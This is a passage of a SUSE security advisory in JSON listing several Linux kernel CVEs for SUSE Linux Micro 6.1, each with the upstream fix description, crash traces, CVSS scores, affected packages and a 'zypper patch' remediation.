"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-53828"
},
{
"cve": "CVE-2023-53831",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53831"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: read sk-\u003esk_family once in sk_mc_loop()\n\nsyzbot is playing with IPV6_ADDRFORM quite a lot these days,\nand managed to hit the WARN_ON_ONCE(1) in sk_mc_loop()\n\nWe have many more similar issues to fix.\n\nWARNING: CPU: 1 PID: 1593 at net/core/sock.c:782 sk_mc_loop+0x165/0x260\nModules linked in:\nCPU: 1 PID: 1593 Comm: kworker/1:3 Not tainted 6.1.40-syzkaller #0\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 07/26/2023\nWorkqueue: events_power_efficient gc_worker\nRIP: 0010:sk_mc_loop+0x165/0x260 net/core/sock.c:782\nCode: 34 1b fd 49 81 c7 18 05 00 00 4c 89 f8 48 c1 e8 03 42 80 3c 20 00 74 08 4c 89 ff e8 25 36 6d fd 4d 8b 37 eb 13 e8 db 33 1b fd \u003c0f\u003e 0b b3 01 eb 34 e8 d0 33 1b fd 45 31 f6 49 83 c6 38 4c 89 f0 48\nRSP: 0018:ffffc90000388530 EFLAGS: 00010246\nRAX: ffffffff846d9b55 RBX: 0000000000000011 RCX: ffff88814f884980\nRDX: 0000000000000102 RSI: ffffffff87ae5160 RDI: 0000000000000011\nRBP: ffffc90000388550 R08: 0000000000000003 R09: ffffffff846d9a65\nR10: 0000000000000002 R11: ffff88814f884980 R12: dffffc0000000000\nR13: ffff88810dbee000 R14: 0000000000000010 R15: ffff888150084000\nFS: 0000000000000000(0000) GS:ffff8881f6b00000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 0000000020000180 CR3: 000000014ee5b000 CR4: 00000000003506e0\nDR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\nDR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\nCall Trace:\n\u003cIRQ\u003e\n[\u003cffffffff8507734f\u003e] ip6_finish_output2+0x33f/0x1ae0 net/ipv6/ip6_output.c:83\n[\u003cffffffff85062766\u003e] __ip6_finish_output net/ipv6/ip6_output.c:200 [inline]\n[\u003cffffffff85062766\u003e] ip6_finish_output+0x6c6/0xb10 net/ipv6/ip6_output.c:211\n[\u003cffffffff85061f8c\u003e] NF_HOOK_COND include/linux/netfilter.h:298 [inline]\n[\u003cffffffff85061f8c\u003e] ip6_output+0x2bc/0x3d0 net/ipv6/ip6_output.c:232\n[\u003cffffffff852071cf\u003e] dst_output include/net/dst.h:444 [inline]\n[\u003cffffffff852071cf\u003e] ip6_local_out+0x10f/0x140 net/ipv6/output_core.c:161\n[\u003cffffffff83618fb4\u003e] ipvlan_process_v6_outbound drivers/net/ipvlan/ipvlan_core.c:483 [inline]\n[\u003cffffffff83618fb4\u003e] ipvlan_process_outbound drivers/net/ipvlan/ipvlan_core.c:529 [inline]\n[\u003cffffffff83618fb4\u003e] ipvlan_xmit_mode_l3 drivers/net/ipvlan/ipvlan_core.c:602 [inline]\n[\u003cffffffff83618fb4\u003e] ipvlan_queue_xmit+0x1174/0x1be0 drivers/net/ipvlan/ipvlan_core.c:677\n[\u003cffffffff8361ddd9\u003e] ipvlan_start_xmit+0x49/0x100 drivers/net/ipvlan/ipvlan_main.c:229\n[\u003cffffffff84763fc0\u003e] netdev_start_xmit include/linux/netdevice.h:4925 [inline]\n[\u003cffffffff84763fc0\u003e] xmit_one net/core/dev.c:3644 [inline]\n[\u003cffffffff84763fc0\u003e] dev_hard_start_xmit+0x320/0x980 net/core/dev.c:3660\n[\u003cffffffff8494c650\u003e] sch_direct_xmit+0x2a0/0x9c0 net/sched/sch_generic.c:342\n[\u003cffffffff8494d883\u003e] qdisc_restart net/sched/sch_generic.c:407 [inline]\n[\u003cffffffff8494d883\u003e] __qdisc_run+0xb13/0x1e70 net/sched/sch_generic.c:415\n[\u003cffffffff8478c426\u003e] qdisc_run+0xd6/0x260 include/net/pkt_sched.h:125\n[\u003cffffffff84796eac\u003e] net_tx_action+0x7ac/0x940 net/core/dev.c:5247\n[\u003cffffffff858002bd\u003e] __do_softirq+0x2bd/0x9bd kernel/softirq.c:599\n[\u003cffffffff814c3fe8\u003e] invoke_softirq kernel/softirq.c:430 [inline]\n[\u003cffffffff814c3fe8\u003e] __irq_exit_rcu+0xc8/0x170 kernel/softirq.c:683\n[\u003cffffffff814c3f09\u003e] irq_exit_rcu+0x9/0x20 kernel/softirq.c:695",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53831",
"url": "https://www.suse.com/security/cve/CVE-2023-53831"
},
{
"category": "external",
"summary": "SUSE Bug 1254701 for CVE-2023-53831",
"url": "https://bugzilla.suse.com/1254701"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-53831"
},
{
"cve": "CVE-2023-53834",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53834"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\niio: adc: ina2xx: avoid NULL pointer dereference on OF device match\n\nThe affected lines were resulting in a NULL pointer dereference on our\nplatform because the device tree contained the following list of\ncompatible strings:\n\n power-sensor@40 {\n compatible = \"ti,ina232\", \"ti,ina231\";\n ...\n };\n\nSince the driver doesn\u0027t declare a compatible string \"ti,ina232\", the OF\nmatching succeeds on \"ti,ina231\". But the I2C device ID info is\npopulated via the first compatible string, cf. modalias population in\nof_i2c_get_board_info(). Since there is no \"ina232\" entry in the legacy\nI2C device ID table either, the struct i2c_device_id *id pointer in the\nprobe function is NULL.\n\nFix this by using the already populated type variable instead, which\npoints to the proper driver data. Since the name is also wanted, add a\ngeneric one to the ina2xx_config table.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53834",
"url": "https://www.suse.com/security/cve/CVE-2023-53834"
},
{
"category": "external",
"summary": "SUSE Bug 1254660 for CVE-2023-53834",
"url": "https://bugzilla.suse.com/1254660"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-53834"
},
{
"cve": "CVE-2023-53836",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53836"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf, sockmap: Fix skb refcnt race after locking changes\n\nThere is a race where skb\u0027s from the sk_psock_backlog can be referenced\nafter userspace side has already skb_consumed() the sk_buff and its refcnt\ndropped to zer0 causing use after free.\n\nThe flow is the following:\n\n while ((skb = skb_peek(\u0026psock-\u003eingress_skb))\n sk_psock_handle_Skb(psock, skb, ..., ingress)\n if (!ingress) ...\n sk_psock_skb_ingress\n sk_psock_skb_ingress_enqueue(skb)\n msg-\u003eskb = skb\n sk_psock_queue_msg(psock, msg)\n skb_dequeue(\u0026psock-\u003eingress_skb)\n\nThe sk_psock_queue_msg() puts the msg on the ingress_msg queue. This is\nwhat the application reads when recvmsg() is called. An application can\nread this anytime after the msg is placed on the queue. The recvmsg hook\nwill also read msg-\u003eskb and then after user space reads the msg will call\nconsume_skb(skb) on it effectively free\u0027ing it.\n\nBut, the race is in above where backlog queue still has a reference to\nthe skb and calls skb_dequeue(). If the skb_dequeue happens after the\nuser reads and free\u0027s the skb we have a use after free.\n\nThe !ingress case does not suffer from this problem because it uses\nsendmsg_*(sk, msg) which does not pass the sk_buff further down the\nstack.\n\nThe following splat was observed with \u0027test_progs -t sockmap_listen\u0027:\n\n [ 1022.710250][ T2556] general protection fault, ...\n [...]\n [ 1022.712830][ T2556] Workqueue: events sk_psock_backlog\n [ 1022.713262][ T2556] RIP: 0010:skb_dequeue+0x4c/0x80\n [ 1022.713653][ T2556] Code: ...\n [...]\n [ 1022.720699][ T2556] Call Trace:\n [ 1022.720984][ T2556] \u003cTASK\u003e\n [ 1022.721254][ T2556] ? die_addr+0x32/0x80^M\n [ 1022.721589][ T2556] ? exc_general_protection+0x25a/0x4b0\n [ 1022.722026][ T2556] ? asm_exc_general_protection+0x22/0x30\n [ 1022.722489][ T2556] ? skb_dequeue+0x4c/0x80\n [ 1022.722854][ T2556] sk_psock_backlog+0x27a/0x300\n [ 1022.723243][ T2556] process_one_work+0x2a7/0x5b0\n [ 1022.723633][ T2556] worker_thread+0x4f/0x3a0\n [ 1022.723998][ T2556] ? __pfx_worker_thread+0x10/0x10\n [ 1022.724386][ T2556] kthread+0xfd/0x130\n [ 1022.724709][ T2556] ? __pfx_kthread+0x10/0x10\n [ 1022.725066][ T2556] ret_from_fork+0x2d/0x50\n [ 1022.725409][ T2556] ? __pfx_kthread+0x10/0x10\n [ 1022.725799][ T2556] ret_from_fork_asm+0x1b/0x30\n [ 1022.726201][ T2556] \u003c/TASK\u003e\n\nTo fix we add an skb_get() before passing the skb to be enqueued in the\nengress queue. This bumps the skb-\u003eusers refcnt so that consume_skb()\nand kfree_skb will not immediately free the sk_buff. With this we can\nbe sure the skb is still around when we do the dequeue. Then we just\nneed to decrement the refcnt or free the skb in the backlog case which\nwe do by calling kfree_skb() on the ingress case as well as the sendmsg\ncase.\n\nBefore locking change from fixes tag we had the sock locked so we\ncouldn\u0027t race with user and there was no issue here.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53836",
"url": "https://www.suse.com/security/cve/CVE-2023-53836"
},
{
"category": "external",
"summary": "SUSE Bug 1254693 for CVE-2023-53836",
"url": "https://bugzilla.suse.com/1254693"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-53836"
},
{
"cve": "CVE-2023-53839",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53839"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndccp: fix data-race around dp-\u003edccps_mss_cache\n\ndccp_sendmsg() reads dp-\u003edccps_mss_cache before locking the socket.\nSame thing in do_dccp_getsockopt().\n\nAdd READ_ONCE()/WRITE_ONCE() annotations,\nand change dccp_sendmsg() to check again dccps_mss_cache\nafter socket is locked.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53839",
"url": "https://www.suse.com/security/cve/CVE-2023-53839"
},
{
"category": "external",
"summary": "SUSE Bug 1254655 for CVE-2023-53839",
"url": "https://bugzilla.suse.com/1254655"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
